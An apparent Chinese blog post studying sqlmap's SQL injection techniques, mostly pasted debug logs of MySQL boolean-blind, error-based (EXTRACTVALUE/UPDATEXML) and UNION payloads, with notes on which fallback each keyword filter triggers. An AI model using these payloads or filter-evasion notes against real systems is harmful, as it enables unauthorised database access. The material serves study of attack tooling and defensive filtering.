[PAYLOAD] ELT(84=84,1)[09:11:53] [PAYLOAD] ELT(91 84,1)[09:11:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:53] [PAYLOAD] ELT(17=17,1)[09:11:53] [PAYLOAD] ELT(17=74,1)[09:11:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:53] [PAYLOAD] ELT(74=28,1)[09:11:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:53] [PAYLOAD] ELT(28=28,1)[09:11:53] [PAYLOAD] ELT(74 28,1)[09:11:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:53] [DEBUG] checking for parameter length constrainting mechanisms[09:11:53] [PAYLOAD] ELT(5697=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5697,1)[09:11:53] [DEBUG] checking for filtered characters[09:11:53] [PAYLOAD] ELT((2220)=2220,1)[09:11:53] [PAYLOAD] ELT(2221>2220,1)GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[09:11:53] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 1530 HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: MySQL boolean-based blind - Parameter replace (ELT - original value)    Payload: id=ELT(4348=4348,1)    Vector: ELT([INFERENCE],[ORIGVALUE])---

禁掉AND，CASE，MAKE_SET，ELT

直接相乘了

[09:16:17] [INFO] checking if the injection point on GET parameter 'id' is a false positive[09:16:17] [PAYLOAD] (66=66)*1[09:16:17] [PAYLOAD] (66=93)*1[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:17] [PAYLOAD] (93=90)*1[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:17] [PAYLOAD] (90=90)*1[09:16:17] [PAYLOAD] (93 90)*1[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:17] [PAYLOAD] (32=32)*1[09:16:17] [PAYLOAD] (32=44)*1[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:17] [PAYLOAD] (44=39)*1[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:17] [PAYLOAD] (39=39)*1[09:16:17] [PAYLOAD] (44 39)*1[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:17] [PAYLOAD] (54=54)*1[09:16:17] [PAYLOAD] (54=99)*1[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:17] [PAYLOAD] (99=89)*1[09:16:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:18] [PAYLOAD] (89=89)*1[09:16:18] [PAYLOAD] (99 89)*1[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:18] [PAYLOAD] (29=29)*1[09:16:18] [PAYLOAD] (29=95)*1[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:18] [PAYLOAD] (95=76)*1[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:18] [PAYLOAD] (76=76)*1[09:16:18] [PAYLOAD] (95 76)*1[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:18] [PAYLOAD] (42=42)*1[09:16:18] [PAYLOAD] (42=88)*1[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:18] [PAYLOAD] (88=74)*1[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:18] [PAYLOAD] (74=74)*1[09:16:18] [PAYLOAD] (88 74)*1[09:16:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:16:18] [DEBUG] checking for parameter length constrainting mechanisms[09:16:18] [PAYLOAD] (6948=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6948)*1[09:16:18] [DEBUG] checking for filtered characters[09:16:18] [PAYLOAD] ((2671)=2671)*1[09:16:18] [PAYLOAD] (2672>2671)*1GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[09:16:18] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 1518 HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: MySQL boolean-based blind - Parameter replace (bool*int - original value)    Payload: id=(9095=9095)*1    Vector: ([INFERENCE])*[ORIGVALUE]---

禁掉AND，CASE，MAKE_SET，ELT，*，就会报错

基于报错型注入（E）

默认情况

extractvalue() :对XML文档进行查询的函数其实就是相当于我们熟悉的HTML文件中用 
标签查找元素一样语法：extractvalue(目标xml文档，xml路径)第二个参数 xml中的位置是可操作的地方，xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式，如果我们写入其他格式，就会报错，并且会返回我们写入的非法格式内容，而这个非法的内容就是我们想要查询的内容。正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错select username from security.user where id=1 and (extractvalue('anything','/x/xx'))

[09:22:46] [PAYLOAD] 1 AND EXTRACTVALUE(7450,CONCAT(0x5c,0x7176627171,(SELECT (CASE WHEN (5241=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5241) THEN 1 ELSE 0 END)),0x71626a6b71))[09:22:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:22:46] [DEBUG] performed 1 queries in 0.12 seconds[09:22:46] [DEBUG] checking for filtered charactersGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[09:22:46] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 430 HTTP(s) requests:---Parameter: id (GET)    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)    Payload: id=1 AND EXTRACTVALUE(4041,CONCAT(0x5c,0x7176627171,(SELECT (ELT(4041=4041,1))),0x71626a6b71))    Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))---

禁掉AND，就会使用OR

[09:27:36] [PAYLOAD] 1 OR EXTRACTVALUE(6984,CONCAT(0x5c,0x716b7a7171,(SELECT (CASE WHEN (2831=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2831) THEN 1 ELSE 0 END)),0x717a7a7171))[09:27:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:27:36] [DEBUG] performed 1 queries in 0.13 seconds[09:27:36] [DEBUG] checking for filtered charactersGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[09:27:36] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 483 HTTP(s) requests:---Parameter: id (GET)    Type: error-based    Title: MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)    Payload: id=1 OR EXTRACTVALUE(9441,CONCAT(0x5c,0x716b7a7171,(SELECT (ELT(9441=9441,1))),0x717a7a7171))    Vector: OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))---

禁掉AND，OR，就会出现updatexml

[09:29:23] [PAYLOAD] (UPDATEXML(9878,CONCAT(0x2e,0x7162716b71,(SELECT (CASE WHEN (8893=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                8893) THEN 1 ELSE 0 END)),0x716b6b6271),9352))[09:29:23] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:29:23] [DEBUG] performed 1 queries in 0.16 seconds[09:29:23] [DEBUG] checking for filtered charactersGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[09:29:23] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 838 HTTP(s) requests:---Parameter: id (GET)    Type: error-based    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)    Payload: id=(UPDATEXML(6736,CONCAT(0x2e,0x7162716b71,(SELECT (ELT(6736=6736,1))),0x716b6b6271),8672))    Vector: (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))---[09:29:23] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.1

禁掉AND，OR，UPDATEXML，就会出现EXTRACTVALUE

[09:31:15] [PAYLOAD] (EXTRACTVALUE(1250,CONCAT(0x5c,0x7171627671,(SELECT (CASE WHEN (9342=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                9342) THEN 1 ELSE 0 END)),0x716b6b6271)))[09:31:15] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:31:15] [DEBUG] performed 1 queries in 0.18 seconds[09:31:15] [DEBUG] checking for filtered charactersGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[09:31:15] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 839 HTTP(s) requests:---Parameter: id (GET)    Type: error-based    Title: MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)    Payload: id=(EXTRACTVALUE(3610,CONCAT(0x5c,0x7171627671,(SELECT (ELT(3610=3610,1))),0x716b6b6271)))    Vector: (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))---

禁掉AND，OR，UPDATEXML，EXTRACTVALUE，就会失败

联合查询（U）

默认情况

[09:37:07] [INFO] checking if the injection point on GET parameter 'id' is a false positive[09:37:07] [PAYLOAD] -1466 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (17=17) THEN 1 ELSE 0 END),0x7162717671)-- hZgY[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -6665 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (17=24) THEN 1 ELSE 0 END),0x7162717671)-- YsNa[09:37:07] [DEBUG] performed 1 queries in 0.02 seconds[09:37:07] [PAYLOAD] -4215 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (17=51) THEN 1 ELSE 0 END),0x7162717671)-- ejrD[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -8306 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (51=24) THEN 1 ELSE 0 END),0x7162717671)-- yobT[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -8304 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (24=24) THEN 1 ELSE 0 END),0x7162717671)-- Gyxy[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -4122 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (51 24) THEN 1 ELSE 0 END),0x7162717671)-- zULK[09:37:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:37:07] [DEBUG] performed 1 queries in 0.14 seconds[09:37:07] [PAYLOAD] -2502 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (47=47) THEN 1 ELSE 0 END),0x7162717671)-- QCrG[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -9061 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (47=70) THEN 1 ELSE 0 END),0x7162717671)-- SJaU[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -4383 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (47=95) THEN 1 ELSE 0 END),0x7162717671)-- ailf[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -4171 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (95=70) THEN 1 ELSE 0 END),0x7162717671)-- TkVB[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -1142 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (70=70) THEN 1 ELSE 0 END),0x7162717671)-- YlcG[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds[09:37:07] [PAYLOAD] -8375 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (95 70) THEN 1 ELSE 0 END),0x7162717671)-- Ijdy[09:37:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:37:08] [DEBUG] performed 1 queries in 0.15 seconds[09:37:08] [PAYLOAD] -4934 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (25=25) THEN 1 ELSE 0 END),0x7162717671)-- IYqW[09:37:08] [DEBUG] performed 1 queries in 0.02 seconds[09:37:08] [PAYLOAD] -1613 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (25=31) THEN 1 ELSE 0 END),0x7162717671)-- lFQL[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -2297 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (25=63) THEN 1 ELSE 0 END),0x7162717671)-- Koxh[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -3230 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (63=31) THEN 1 ELSE 0 END),0x7162717671)-- DFuT[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -4541 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (31=31) THEN 1 ELSE 0 END),0x7162717671)-- wbyE[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -4571 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (63 31) THEN 1 ELSE 0 END),0x7162717671)-- RoAK[09:37:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:37:08] [DEBUG] performed 1 queries in 0.13 seconds[09:37:08] [PAYLOAD] -4255 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (12=12) THEN 1 ELSE 0 END),0x7162717671)-- HeVB[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -2162 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (12=59) THEN 1 ELSE 0 END),0x7162717671)-- UdBM[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -3636 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (12=85) THEN 1 ELSE 0 END),0x7162717671)-- quEm[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -9996 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (85=59) THEN 1 ELSE 0 END),0x7162717671)-- tmiF[09:37:08] [DEBUG] performed 1 queries in 0.03 seconds[09:37:08] [PAYLOAD] -1861 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (59=59) THEN 1 ELSE 0 END),0x7162717671)-- dZZv[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -2005 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (85 59) THEN 1 ELSE 0 END),0x7162717671)-- OulK[09:37:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:37:08] [DEBUG] performed 1 queries in 0.11 seconds[09:37:08] [PAYLOAD] -2028 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (26=26) THEN 1 ELSE 0 END),0x7162717671)-- iRZQ[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -2447 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (26=39) THEN 1 ELSE 0 END),0x7162717671)-- IPSM[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -8785 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (26=83) THEN 1 ELSE 0 END),0x7162717671)-- cbzQ[09:37:08] [DEBUG] performed 1 queries in 0.02 seconds[09:37:08] [PAYLOAD] -2637 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (83=39) THEN 1 ELSE 0 END),0x7162717671)-- wwBL[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -8945 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (39=39) THEN 1 ELSE 0 END),0x7162717671)-- qohR[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds[09:37:08] [PAYLOAD] -2184 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (83 39) THEN 1 ELSE 0 END),0x7162717671)-- vJmq[09:37:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:37:08] [DEBUG] performed 1 queries in 0.13 seconds[09:37:08] [DEBUG] checking for parameter length constrainting mechanisms[09:37:08] [PAYLOAD] -6805 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (6024=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6024) THEN 1 ELSE 0 END),0x7162717671)-- aqzt[09:37:08] [DEBUG] performed 1 queries in 0.02 seconds[09:37:08] [DEBUG] checking for filtered charactersGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[09:37:08] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 87 HTTP(s) requests:---Parameter: id (GET)    Type: UNION query    Title: Generic UNION query (NULL) - 2 columns    Payload: id=-1722 UNION ALL SELECT NULL,CONCAT(0x71787a7671,0x417a6144526d48684971744f484c49585966416b4b66736851446c6d53787a63446b41705a715747,0x7162717671)-- Nyot    Vector:  UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT]---

禁掉union，就会报错

禁掉SELECT，也会报错

禁掉CONCAT，也会失败

禁掉CASE

关于如何研究sqlmap使用的注入技术就分享到这里了，希望以上内容可以对大家有一定的帮助，可以学到更多知识。如果觉得文章不错，可以把它分享出去让更多的人看到。